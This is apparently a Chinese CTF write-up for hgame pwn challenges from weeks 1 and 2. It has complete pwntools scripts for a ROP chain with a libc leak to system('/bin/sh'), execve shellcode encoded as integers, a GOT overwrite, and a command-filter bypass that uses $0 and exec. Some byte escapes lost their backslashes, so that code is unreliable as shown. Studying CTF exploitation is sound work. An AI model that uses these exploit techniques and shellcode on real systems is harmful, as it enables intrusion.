hgame pwn部分wp

WEEK 1

1，Hard_AAAAA

from pwn import*
context.log_level = 'debug'

sh=remote('47.103.214.163',20000)
#sh=process('/home/harmonica/Desktop/hgame/Hard_AAAAA')

sh.recv()
payload='a'*0x7b+'x30'+'x4f'+'x30'+'x6f'+'x00'+'x4f'+'x30'
sh.sendline(payload)

sh.interactive()

2，one_shot

在bss段name和flag是相连的

 漏洞点在

 可在任意地址写入x01

于是可以在0x6010E0处写入x01,破坏scanf加入的截断符，使printf输出name+flag

from pwn import *

p = remote('47.103.214.163',20002)

p.recvuntil('your name?
')
p.sendline('a'*31)
p.recv()
p.sendline('6295775')

p.interactive()

 3，ROP_LEVEL0

其实就是个开了nx的栈溢出，rop就好了，但不知为何当时做的时候死活求不出libc，结果复现时候好了。。。

from pwn import *
from LibcSearcher import LibcSearcher

context.log_level = 'debug'

sh=remote('47.103.214.163',20003)
#sh=process('/home/harmonica/ROP_LEVEL0')
elf=ELF('/home/harmonica/ROP_LEVEL0')
#libc=ELF('./db/libc6_2.23-0ubuntu10_amd64')
def send(content):
    sh.recvuntil('You can not only cat flag but also Opxx Rexx Wrxxx ./flag
')
    sh.sendline(content)

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.symbols['main']
pop_rdi=0x400753

payload ='A' * 0x58+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
send(payload)

puts_addr=u64(sh.recv(6).ljust(8,'x00'))
libc=LibcSearcher('puts', puts_addr)
libcbase=puts_addr-libc.dump("puts")
log.success("libcbase: "+hex(libcbase))

system_addr=libcbase+libc.dump("system")
binsh_addr=libcbase+libc.dump("str_bin_sh")

payload ='A'*0x58+p64(pop_rdi)+p64(binsh_addr)+p64(system_addr)
send(payload)

sh.interactive()

4，Number_Killer

shellcode使用，给了 jmp rsp，因为longlong的限制，部分shellcode要用负数

from pwn import *

#p = process("./Number_Killer")
p = remote('47.103.214.163',20001)
p.recvuntil("Let's Pwn me with numbers!
")

def sendNumber(num):
    p.sendline(str(num))
    sleep(0.1)

for i in range(12):
    sendNumber(0xc00000000)         

sendNumber(0x40078d)

shellcode = 'jhHxb8/bin///sPHx89xe7hrix01x01x814$x01x01x01x011xf6Vjx08^Hx01xe6VHx89xe61xd2j;Xx0fx05'             

shellcode = [7955998173821429866,-1762798268771782865,2608851925472997992,7662582506348151041,-8554491946326270456,364607107058774502]


print(len(shellcode))
for i in range(6):
    num = shellcode[i]
    sendNumber(num)

p.interactive()

 WEEK 2

1,findyouself

先让猜测当前目录位置，用

ls -l /proc/self/cwd

然后进入下一步，

 可在执行一条命令，但是对输入有限制，不能用/bin/sh

可以用$0代替

之后的close关闭了输出，用

exec 1>&0

打开输出流就可以了

 2,Another_Heaven

 在init里打开了flag文件

 此处有一个任意写的机会，可以修改一个地址的值，往后cpswd()里

strncpy里用到了flag

 于是可以用之前的任意写将strncpy改为puts

#-*- coding:utf-8 -*-

from pwn import *
from time import *
context.log_level="debug"

sh = remote('47.103.214.163',21001)
#sh = process('/home/harmonica/Another_Heaven')

sh.recv()
sh.sendline('6299680')
sh.send('xe6')
sh.recvuntil(':')
sh.sendline('E99p1ant')
sh.recvuntil(':')
sh.sendline('password')
sh.recvuntil('(y/n)')
sh.sendline('y')
sh.recvuntil('?')
sh.sendline("Alice·Synthesis·Thirty")
sh.recvuntil(":")
sh.sendline('password')
sh.recv()

sh.interactive()